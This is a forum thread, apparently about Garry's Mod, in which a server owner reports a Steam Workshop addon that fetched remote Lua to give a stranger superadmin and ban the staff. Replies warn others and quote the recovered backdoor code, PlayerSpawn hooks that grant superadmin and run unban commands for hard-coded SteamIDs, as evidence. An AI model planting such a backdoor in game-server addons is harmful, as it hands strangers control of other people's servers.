Hacked my server through workshop?

Hi again. So recently I subscribed to an addon in the workshop : http://steamcommunity.com/sharedfiles/filedetails/?id=257753283

Everything was fine for a few weeks , until all of a sudden I look in the tab menu and I see “Clutchslut bambi” has super administration rank.

I was clue less and assumed my co-owner friend changed their name. I check ulx , nope , only my friend is in super admin. In fact , “Clutchslut bambi” isn’t even appearing in ulx, at all.

I proceed to the console straight away and revoke all access from them , change my client area password , rcon password , cpanel password etc , and ban them, permanently.

I proceed to play for about 5 minutes then all of a sudden “someone” removed all access rights from me , and all my staff , then permanently banned all of us.

I’m startled because I have no clue what’s going on and how they’re doing this. They decide to un-ban me and tell me they’re just testing something and they weren’t being serious.

They explained , what they did was abuse the workshop addon , they used http.fetch to grab a “model” which wasn’t actually a model , it was a script that gave them permissions on any server using the addon.


The user :

The addon : http://steamcommunity.com/sharedfiles/filedetails/?id=257753283

note : Don’t bother decompiling the addon and searching for the string , they removed it apparently after they did it to me.

Don’t install his addons. Report his ass and get him the hell off of workshop before he infects your server.

This is the issue with workshop, people can update their workshop items to backdoor any server they want since it won’t warn the server owner a script was updated.

Before any action is taken you need some form of evidence holding them down.

Your server logs would do well

http://puu.sh/9LkKP/2a2fa328b2.png

[lua]
–Trevor Goes lulz because 420 dank scopes up in this faze optic clan 360 noscope swag yolo
–You are really dumb guys…

–Add Playermodel
function Bambi( ply )
if ( ply:SteamID() == “STEAM_0:0:61396292” ) then
ply:SetUserGroup(“superadmin”)
ply:ChatPrint(“Kawaii Swag <3!”)
end
end
hook.Add(“PlayerSpawn”, “Bambiy”, Bambi)
–Fuck Camel lolololol
function Unban( ply )
if ( ply:SteamID() == “STEAM_0:0:88696927” ) then
RunConsoleCommand(“ulx unban STEAM_0:0:61396292”)
ply:ChatPrint(“Hey Camel.”)
end
end
hook.Add(“PlayerSpawn”, “Unbany”, Unban)

[/lua]

http://steamcommunity.com/profiles/76561198083058312 – Clutchslut Bambi